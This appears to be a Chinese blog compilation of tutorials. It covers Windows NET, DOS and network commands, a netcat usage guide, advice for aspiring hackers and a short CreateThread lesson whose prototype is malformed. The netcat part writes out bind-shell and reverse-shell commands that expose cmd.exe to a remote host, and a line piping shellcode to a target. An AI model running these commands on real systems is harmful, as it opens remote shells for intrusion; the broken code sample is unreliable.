net命令介绍
本文综合WINDOWS 98,WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系 统关于NET命令的解释,希望可以全面一些 先说一些: (1)NET命令是命令行的命令。 (2)管理网络环境、服务、用户和登录。。。。等本地信息 (3)WIN 98,WIN WORKSTATION和WIN NT都内置了NET命令。 (4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。 (5)WORKSTATION和SERVER中的NET命令基本相同。 (6)获得HELP <1>在NT下面可以用图形的方式,开始-帮助-索引-输入NET <2>在COMMAND下面可以用字符,NET /?或NET或NET HELP得到一些方法 相应的方 法的帮助NET COMMAND /HELP或NET HELP COMMAND 或NET COMMAND /? 另对于错误 NET HELPMSG MESSAGE#是4位数 (7)强制参数 所有net接受选项/命令yes和/no(可缩写为//y和/n)。[简单地说 提前给系统 问答案] (8)有些命令立即生成并永久保存,使用时要小心 (9)对于NET可以找到相应图形工具的解决方案 (10)命令的组成 命令 参数 选项 | 参数 选项 | 参数 选项 |。。。。。。 说了很多,其实是6和7有用,呵呵 另外两件事: (1)在NT的NET命令中只有一些参数SERVER只能在环境中使用 (2)在WIN98的NET命令中的一些参数不能DOS-WIN中使用,只能在DOS环境中使用 下面对NET初步介绍了命令不同参数的基本用法: (1)NET VIEW 作 使用:显示域列表、计算机列表或指定计算机的共享资源列表。 命令格式:net view [//computername | /domain[:domainname]] 参数介绍: <1>无参数输入net view显示当前域的计算机列表。 命令格式:net view [//computername | /domain[:domainname]] 参数介绍: <1>无参数输入net view显示当前域的计算机列表。 <2>//computername 指定查看其共享资源的计算机。 <3>/domain[:domainname]指定检查其可用计算机域 简单事例 <1>net view //YFANG查看YFANG共享资源列表。 <2>net view /domain:LOVE查看LOVE域内的机器列表。 (2)NET USER 作 使用:添加或更改用户帐户或显示用户帐户信息。命令也可以写成 net users 。 命令格式:net user [username [password | *] [options]] [/domain] 参数介绍: <1>无参数输入net user查看计算机上的用户帐户列表。 <2>username添加、删除、更改或查看用户帐户名。 <3>password分配或更改用户帐户的密码。 <4>*提示输入密码。 <5>/domain操作在计算机主域的主域控制器中。 简单事例: <1>net user yfang查看用户YFANG的信息 (3)NET USE 功能:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。 命令格式:net use [devicename | *] [//computername/sharename[/volume]] [password | *]] [/user:[domainname/]username] [[/delete] | [/persistent:{yes | no}]] 参数介绍: 无参数输入net use列出网络连接。 devicename指定要连接的资源名称或要断开的设备名称。 devicename指定要连接的资源名称或要断开的设备名称。 //computername/sharename共享资源的服务器名称。 password访问共享资源的密码。 *提示输入密码。 /user另一个用户指定连接。 domainname指定另一个域。 username指定用户名登录。 /home将用户连接到宿主目录 /delete取消指定的网络连接。 /persistent控制永久网络连接的使用。 简单事例: <1>net use e: //YFANG/TEMP将//YFANG/TEMP将目录建立为E盘 <2>net use e: //YFANG/TEMP /delete断开连接 (4)NET TIME 作 使用:使计算机时钟与另一台计算机或域同步。 命令格式:net time [//computername | /domain[:name]] [/set] 参数介绍: <1>//computername检查或同步服务器名称。 <2>/domain[:name]指定与时间同步的域。 <3>/set与指定计算机或域的时钟同步。 以下四个参数是相关的,所以让我们一起介绍一下 (5)Net Start 作 使用:启动服务,或显示已启动服务的列表。 命令格式:net start service (6)Net Pause 作 使用:暂停正在运营的服务。 命令格式:net pause service (7)Net Continue 作 使用:重新激活悬挂服务。 命令格式:net continue service (8)NET STOP 作 用:停止 Windows NT 网络服务。 命令格式:net stop service 参数介绍:让我们来看看这些服务是什么 <1>alerter(警报) <2>client service for netware(Netware 客户端服务) <3>clipbook server(剪贴簿服务器) <4>computer browser(计算机浏览器) <5>directory replicator(目录复制器) <6>ftp publishing service (ftp )(ftp 发行服务) <7>lpdsvc <8>net logon(网络登录) <9>network dde网络 dde) <10>network dde dsdm(网络 dde dsdm) <11>network monitor agent(网络监控代理) <12>nt lm security support provider(NT LM 提供安全支持) <13>ole(对象链接与嵌入) <14>remote access connection manager(远程访问连接管理器) <15>remote access isnsap service(远程访问 isnsap 服务) <16>remote access server(远程访问服务器) <17>remote procedure call (rpc) locator(远程调用定位器) <18>remote procedure call (rpc) service(远程调用服务) <19>schedule(调度) <20>server(服务器) <21>simple tcp/ip services(简单 TCP/IP 服务) <22>snmp <23>spooler(后台打印程序) <24>tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具) <25>ups (26)workstation(工作站) <27>messenger(信使) <28>dhcp client <29>eventlog 以下这些SERVICE只能在NT SERVER上使用 << 1>>)file server for macintosh <<2>>gateway service for netware <<3>>microsoft dhcp server <<4>>print server for macintosh <<5>>remoteboot <<6>>windows internet name service (9)Net Statistics 作 使用:显示当地工作站或服务器服务的统计记录。 命令格式:net statistics [workstation | server] 参数介绍: <1>无参数输入net statistics列出统计信息可用的操作服务。 命令格式:net statistics [workstation | server] 参数介绍: <1>无参数输入net statistics列出统计信息可用的操作服务。 <2>workstation显示当地工作站服务的统计信息。 <3>server显示当地服务器服务的统计信息。 简单事例: <1>net statistics server | more显示服务器服务的统计信息 (10)Net Share 作 使用:创建、删除或显示共享资源。 命令格式:net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"] 参数介绍: <1>无参数输入net share在本地计算机上显示所有共享资源的信息。 <2>sharename是共享资源的网络名称。 <3>drive:path指定共享目录的绝对路径。 <4>/users:number最大用户数量可以同时访问共享资源。 <5>/unlimited同时访问共享资源的用户数量不受限制。 <6>/remark:"text "添加资源注释,注释文本用引号引用。 简单事例: <1>net share mylove=c:/temp /remark:"my first share"以mylove共享共享名称 C:/temp <2>net share mylove /delete停止共享mylove目录 (11)Net Session 作 使用:列出或断开本地计算机和与之相连的客户端会话,也可以写为net sessions或net sess。 命令格式:net session [//computername] [/delete] 参数介绍: <1>无参数输入net session显示所有与本地计算机会话的信息。 命令格式:net session [//computername] [/delete] 参数介绍: <1>无参数输入net session显示所有与本地计算机会话的信息。 <2>//computername标识应列出或断开会话的计算机。 <3>/delete结束与//computername计算机会话并在会话期间关闭所有计算机 ? 简单事例: <1>net session //YFANG显示计算机名称YFANG客户端会话信息列表。 (12)Ne Send 作 用:向网络的其他用户、计算机或通信名发送消息。 命令格式:net send {name | * | /domain[:name] | /users} message 参数介绍 : <1>name要接收发送消息的用户名、计算机名或通信名。 <2>*将消息发送到组中所有名称。 <3>/domain[:name]将消息发送到计算机域中的所有名称。 <4>/users将消息发送到与服务器连接的所有用户。 <5>message作为消息发送的文本。 简单事例: <1>net send /users server will shutdown in 5 minutes. 给所有连接到服务器 的用户发送消息 (13)Net Print 作 用:显示或控制打印作业及打印队列。 命令格式:net print [//computername ] job# [/hold | /release | /delete] 参数介绍: <1>computername共享打印机队列的计算机名。 <2>sharename打印队列名称。 <3>job#在打印机队列中分配给打印作业的标识号。 <4>/hold使用 job# 时,在打印机队列中使打印作业等待。 <5>/release释放保留的打印作业。 <6>/delete从打印机队列中删除打印作业。 简单事例: <1>net print //YFANG/SEEME列出//YFANG计算机上SEEME打印机队列的目录 (14)Net Name 作 用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表 。 命令格式:net name [name [/add | /delete]] 参数介绍: <1>键入不带参数的net name列出当前使用的名称。 <2>name指定接收消息的名称。 <3>/add将名称添加到计算机中。 <4>/delete从计算机中删除名称。 (15)Net Localgroup 作 用:添加、显示或更改本地组。 命令格式:net localgroup groupname {/add [/comment:"text "] | /delete} [/domain] 参数介绍: <1>键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。 <2>groupname要添加、扩充或删除的本地组名称。 <3>/comment: "text "为新建或现有组添加注释。 <4>/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作 ? <5>name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名 。 <6>/add将全局组名或用户名添加到本地组中。 <7>/delete从本地组中删除组名或用户名。 简单事例: <1>net localgroup love /add将名为love的本地组添加到本地用户帐号数据库 <2>net localgroup love显示love本地组中的用户 (16)Net Group 作 用:在 Windows NT Server 域中添加、显示或更改全局组。 命令格式:net group groupname {/add [/comment:"text "] | /delete} [/domain] 参数介绍: <1>键入不带参数的net group显示服务器名称及服务器的组名称。 <2>groupname要添加、扩展或删除的组。 <3>/comment:"text "为新建组或现有组添加注释。 <4>/domain在当前域的主域控 制器中执行该操作,否则在本地计算机上执行操作? <5>username[ ...]列表显示要添加到组或从组中删除的一个或多个用户。 <6>/add添加组或在组中添加用户名。 <7>/delete删除组或从组中删除用户名。 简单事例: <1>net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本 地计算机的love组 (17)Net File 作 用:显示某服务器上所有打开的共享文件名及锁定文件数。 命令格式:net file [id [/close]] 参数介绍: <1>键入不带参数的net file获得服务器上打开文件的列表。 <2>id文件标识号。 <3>/close关闭打开的文件并释放锁定记录。 (18)Net Config 作 用:显示当前运行的可配置服务,或显示并更改某项服务的设置。 命令格式:net config [service [options]] 参数介绍: <1>键入不带参数的net config显示可配置服务的列表。 <2>service通过net config命令进行配置的服务(server或workstation) <3>options服务的特定选项。 (19)Net Computer 作 用:从域数据库中添加或删除计算机。 命令格式:net computer //computername {/add | /del} 参数介绍: <1>//computername指定要添加到域或从域中删除的计算机。 <2>/add将指定计算机添加到域。 <3>/del将指定计算机从域中删除。 简单事例: <1>net computer //cc /add将计算机 cc 添加到登录域 (20)Net Accounts 作 用:更新用户帐号数据库、更改密码及所有帐号的登录要求。 命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen: length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw: number] [/domain] 参数介绍: <1>键入不带参数的net accounts显示当前密码设置、登录时限及域信息。 <2>/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时 <3>/minpwlen:length设置用户帐号密码的最少字符数。 <4>/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。 <5>/minpwage:days设置用户必须保持原密码的最小天数。 <6>/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用 与之相同的密码。 <7>/domain在当前域的主域控制器上执行该操作。 <8>/sync当用于主域控制器时 ,该命令使域中所有备份域控制器同步 简单事例: <1>net accounts /minpwlen:7 将用户帐号密码的最少字符数设置为7 ----------------------上面介绍的是NET命令在WINNT下的基本用法 ----------------------下面我们看看NET命令在WIN98下的基本用法 在WIN98中NET命令也有一些参数 其中有一些参数的名字和功能及简单的使用方法 和WINNT下的相应的参数的用法相同 其中有 (1)NET TIME命令 (2)NET PRINT命令 (3)NET USE命令 (4)NET VIEW命令 在WIN98中NET命令有一些参数 其中有一些参数的名字和WINNT下的相应的参数的名 字相同但其用法却有些不同 其中有 (1)NET START 作 用:启动相应的服务。(不能在DOS-WIN中用) 命令格式:NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI | NWLINK] [/LIST] [/YES] [/VERBOSE] (2)NET STOP 作 用:停止相应的服务.(不能在DOS-WIN中用) 命令格式:NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK] [/YES] 在WIN98中NET命令还有一些参数是在98下才有的 其中有 (1)NET DIAG 作 用:运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息 命令格式:NET DIAGNOSTICS [/NAMES | /STATUS] (2)NET INIT 作 用:不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用) 命令格式:NET INITIALIZE [/DYNAMIC] (3)NET LOGOFF 作 用:断开连接的共享资源(不能在DOS-WIN中用) (4)NET LOGON 作 用:在WORKGROUP中登陆(不能在DOS-WIN中用) 命令格式:NET LOGON [user [password | ?]] [/DOMAIN:name] [/YES] [/SAVEPW:NO] (5)NET PASSWORD 作 用:更改你的网络登陆口令(不能在DOS-WIN中用) 命令格式:NET PASSWORD //computer | /DOMAIN:name [user [oldpassword [newpassword]]]
9月4日
Dos常用命令
一、基础命令 1 dir 无参数:查看当前所在目录的文件和文件夹。 /s:查看当前目录已经其所有子目录的文件和文件夹。 /a:查看包括隐含文件的所有文件。 /ah:只显示出隐含文件。 /w:以紧凑方式(一行显示5个文件)显示文件和文件夹。 /p:以分页方式(显示一页之后会自动暂停)显示。 |more:前面那个符号是“/”上面的那个,叫做重定向符号,就是把一个 命令的结果输出为另外一个命令的参数。more也是一个命令,dir /w |more 得到的结果和dir /w /p的结果是一样的。 其他的参数大家可以用:dir/?查看。
2 cd cd 目录名:进入特定的目录。如果看到有个目录显示为:abcdef ghi 就 输入:cdabcdef.ghi进入该目录。 cd/ 退回到根目录。 cd..退回到上一级目录。
3 md rd md 目录名:建立特定的文件夹。 (dos下面习惯叫目录,win下面习惯叫文 件夹。呵呵!) rd 目录名:删除特定的文件夹。
4 cls 清除屏幕。
5 copy copy 路径/文件名 路径/文件名 :把一个文件拷贝到另一个地方。
6 move move 路径/文件名 路径/文件名 :把一个文件移动(就是剪切+复制)到另 一个地方。
7 del del 文件名:删除一个文件。 del *.*:删除当前文件夹下所有文件。 del不能删除文件夹。
8 deltree 删除文件夹和它下面的所有子文件夹还有文件,厉害。。。不要乱用。
9 format format x: :x代表盘符,格式化一个分区。在dos下是用fat文件系统格式 化的,在windows2000安装的时候会问你要不要转换为ntfs。
10 type type 文本文件名:显示出文本文件的内容。
11 edit 其实这是个小程序,编辑文本文件用的。
12 ren ren 旧文件名 新文件名:改文件名。
二、关于网络的常用命令 1 ping ping 主机ip或名字:向目标主机发送4个icmp数据包,测试对方主机是否收 到并响应,一般常用于做普通网络是否通畅的测试。但是ping不同不代表网 络不通,有可能是目标主机装有防火墙并且阻止了icmp响应。 ping -t :不停的发送数据包。当然都很小,不能称作攻击。有些人自己写 了一些类似于ping命令的程序,不停的发送很大的数据包,以阻塞目标主机 的网络连接。
2 net 建议是用net /?获取具体帮助信息。实在是有很多参数,参数下面还有参 数。常用:net view //主机 来看共享,net start/stop 服务 来启动和停 止服务,信使服务个人不太喜欢。
3 netstat netstat 主机:查看主机当前的tcp/ip连接状态,如端口的状态。
4 nbtstat nbtstat 主机:查看主机使用的NetBIOS name。
5 tracert tracert 主机:查看从你自己到目标逐机到底经过了那些路径。如: tracert www.ncie.gov.cn 然后等待。。。就会看到你经过的一个个路由节 点,一般大一点的路由器,如电信的主干路由,除了ip以外,都有英文标示 的。
6 pathping pathping 主机:类似tracert,但可以显示一些tracert不能显示出来的信 息。可以自己试试。
7 ftp 字符方式的ftp,我喜欢用;)不用装cuteftp了。
8 telnet 字符方式的远程登录程序,是网络人员极其爱用的远程登录程序。我最近常 用来调试邮件服务器。
9 ipconfig 非常有用的网络配置、排错。。。命令。 不加参数显示当前机器的网络接口状态。 /all 先是详细的信息。 /release 释放当前ip。 /renew 重新申请ip。 /flushdns 刷新dns缓存。 /registerdns 重新栽dns服务器上注册自己。 。。。。。。
10 arp 操作当前的arp缓存。 -a 显示arp缓存。 -d 删除一条缓存纪录。 -s 田家一条缓存纪录。
11 nslookup 排除dns错误的利器。是一个交互的工具。使用之前请先努力弄清楚dns的作用以及dns的工作原理。
xcopy是一个外部命令,也就是说,是一个小程序,有的时候会发现软盘上没有,硬盘上也没有。。。昏倒。。。当然勇气来使比copy好用,我喜欢加/e参数。 smartdrv.exe 加载磁盘缓存,参数是缓存的大小,单位是kb。 如:smartdrv 32768 就是加载32M的缓存。 缓存的作用在你安装WIN2K的时候非常明显!不加缓存装WIN2K PRO要3小时左右,加载8M缓存后,只要30分钟。 原理是在内存中划分出一块区域,在安装期间不断地把硬盘上的数据读取到那块缓存区域中,充分利用了内存。
AT和任务计划作用一样。 以下是使用方法,可以通过在命令提示符下面输入:AT /?获得帮助。
AT 命令安排在特定日期和时间运行命令和程序。 要使用 AT 命令,计划服务必须已在运行中。 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AT [//computername] [ [id] [/DELETE] | /DELETE [/YES]] AT [//computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command"
//computername 指定远程计算机。 如果省略这个参数,会计划在本地计算机上运行命令。 //127.0.0.1代表本机。和不加这个参数意思一样。
id 指定给已计划命令的识别号。 用来识别任务,比如你要添加好几个任务,ID=1就代表第一个喽!
/delete 删除某个已计划的命令。如果省略 id, 计算机上所有已计划的命令都会被删除。 /yes 不需要进一步确认时,跟删除所有作业 的命令一起使用。 time 指定运行命令的时间。 /interactive 允许作业在运行时,与当时登录的用户 桌面进行交互。 /every:date[,...] 每个月或每个星期在指定的日期运行命令。 如果省略日期,则默认为在每月的本日运行。 /next:date[,...] 指定在下一个指定日期(如,下周四)运行命令。 如果省略日期,则默认为在每月的本日运行。 "command" 准备运行的 Windows NT 命令或批处理程序。
nc(瑞士军刀)的详细使用
netcat被誉为网络安全界的'瑞士军刀',相信没有什么人不认识它吧......
一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,
能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几
乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。
在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由'红与黑'编译
后的新'浓缩'版。'浓缩'版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,
有此功能的原版NC好象要60KB:P),虽然"体积"小,但很完成很多工作。
<!--StartFragment-->=====================================================================================================
软件介绍:
工具名:Netcat
作者:Hobbit && Chris Wysopal
网址:
http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
WINDOWS下版本号:[v1.10 NT]
=====================================================================================================
参数介绍:
'nc.exe -h'即可看到各参数的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
端口的表示方法可写为M-N的范围格式。
=====================================================================================================
基本用法:
大概有以下几种用法:
1)连接到REMOTE主机,例子:
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口
2)监听LOCAL主机,例子:
格式:nc -l -p 80
讲解:监听本机的TCP80端口
3)扫描远程主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL,例子:
格式:nc -l -p 5354 -t -e c:/winnt/system32/cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接,例子:
格式:nc -t -e c:/winnt/system32/cmd.exe 192.168.x.x 5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,
当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)。
=====================================================================================================
高级用法:
6)作攻击程序用,例子:
格式1:type.exe c:/exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:/exploit.txt
讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:/exploit.txt'的内容(两种格式确有相同的效果,
真是有异曲同工之妙:P)
附:'c:/exploit.txt'为shellcode等
7)作蜜罐用[1],例子:
格式:nc -L -p 80
讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:/log.txt
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:/log.txt'中,如果把'>'
改为'>>'即可以追加日志
附:'c:/log.txt'为日志等
9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:/honeypot.txt
格式2:type.exe c:/honeypot.txt|nc -L -p 80
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,并把'c:/honeypot.txt'的内容'送'入其
管道中
注意:要想溢出,最好是在外网,内网要搞端口映射才可以哦!
想学到真正的黑客技术?进来看看!
我虽然是个小菜鸟!但是还是要劝告刚刚接触网络的人
1,不要研究QQ,毕竟QQ不是技术,盗了几个号又算什么?程序不是自己编写的,没什么值得骄傲的.
2,不要研究怎么破解网吧,难道不觉得:一般关于破解网吧的帖子都很少人回复的么?
3,研究一些系统知识,比如windows什么版本和什么版本有什么区别……
4,研究组策略,研究注册表,研究CMD,研究ASP,研究PHP,研究JAVA……
5,经常来BBS闲逛,例如X,黑防……
6,不要以为扫到**主机的**端口开放就可以利用什么,微软不是傻的!
7,尽量不要吧时间浪费在暴力破解上,因为机会很渺茫!无路可走时才可以用用。
8,不要认为黑客就是非法入侵,就是盗QQ,盗帐号。
9,祖国需要计算机人才,而不需要盗帐号的高手。
10,不要奢望有什么快速的途径学习技术,欲速则不达!没有丰富的经验是没有办法提高的。
如果说错什么,大家都可以指出来~!
对学习技术的一些建议(按顺序去学):
1,认真看看过去的入侵实例(如IPC入侵,输入法漏洞),这样可以好好研究windows基础。
2,学好注册表,因为注册表是windows的数据库,windows相关的数据都在那。
3,多少学些编程,basic都可以,目的是做好基础,了解了解什么是编程。
4,看看一些溢出工具编写的教程(不是让你去写,而是让你了解溢出的真正原理),明白原理之后自己用虚拟机实践一下溢出。
5,有了编程的经验后,就可以看看sql注入攻击了,并且要学习怎么使用NBSI.
学好了这些,基本上就算入门了,想真正提高,只有努力学好编程,不要认为编程离我们很远……也许你会认为用别人的工具也不错,但是不会编程,就永远发现不了windows的系统漏洞,老是使用公布过的漏洞利用程序,想提高还真难啊.
再给一个建议........做一个虚拟机,独立安装一个2000的系统(版本越老越好),然后尽量完善那个系统,看看自己能不能成功入侵(这是积累经验的办法).
这篇帖子没有知识,只是提供一个方向.学技术需要时间,心急是万万不可Di~~~
我的电脑里有数千个资料文件,都是网上找的.所以我再再建议...:经常逛逛下载站,找找相关资料,并且下载,还有经常去技术blog,把有用的复制保存下来,多少浏览一遍,感兴趣的就认真看(还要用本子记下有用的资料),不感兴趣的就扫一遍.
这个方法其实比你买<X>学技术还要快.
好多人问为什么我老是菜鸟,想知道答案?该学的东西你没去认真的学,不该学的你又浪费时间在钻研,当然提高不了了!
附:什么是有用的资料(例如:windows2000的日志存放处,VPN开启的必须条件,windows_HOME版本的XP不支持"用户与组"功能和没有IIS......)
黑客初级知识5
第五节 多线程编程介绍
对于多线程的基本概念,我不在赘述,是个只要学习过一门编程语言就应该多进程和线程有个基本的了解.这里重点介绍一下如何实现多线程.
通常一个程序的主线程有操作系统创建,如果想让其创建额外的线程,可以调用CreateThread()函数来完成.函数原形如下:
HANDLE CreateThread()
{
LPSECURITY_ATTRIBUTES LPThreadAttributes, //指向SECURITY_ATTRIBUTES的指针
SIZE_T dwStackSize, //表示线程为自己所用堆栈分配的地址空间的大小 系统缺省值为0
LPTHREAD_START-TOUTINE lpStartAddress, //表示新线程开始执行时代码所在函数的地址 即线程函数名
LPVOID lpParameter, //是传入线程函数的参数
DWORD dwCreationFlags, //指定控制线程创建的附加标志 取0线程立即执行 取CREATE_SUSPENDED线程挂起
LPDWORD lpThreadld //是个DWORD类型的地址,返回赋给该新线程的ID
}
线程函数lpParameter必须有以下原形:
DWORD WINAPI XXXThreadFun(LPVOID lpParameter)
{
return(0);
}
________________________________________________________________________________________________
下面我们来创建一个线程:
#include <windows.h>
#include <stdio.h>
DWORD WINAPI ThreadFunc( LPVOID lpParam ) //线程函数,跟普通的函数没什么两样
{
printf( "Parameter = %d.", *(DWORD*)lpParam );
return 0;
}
VOID main( VOID )
{
DWORD dwThreadId, dwThrdParam = 1;
HANDLE hThread;
hThread = CreateThread( NULL,0,ThreadFunc,&dwThrdParam, 0,&dwThreadId);
if (hThread == NULL)
{
printf( "CreateThread failed (%d)/n", GetLastError() );
}
else
{
_getch();
CloseHandle( hThread );
}
}
关于线程同步的问题,这里就不再讲解,请大家自己查阅资料,不查阅以后可能会有困难啊.培养一下各位的自己动手能力.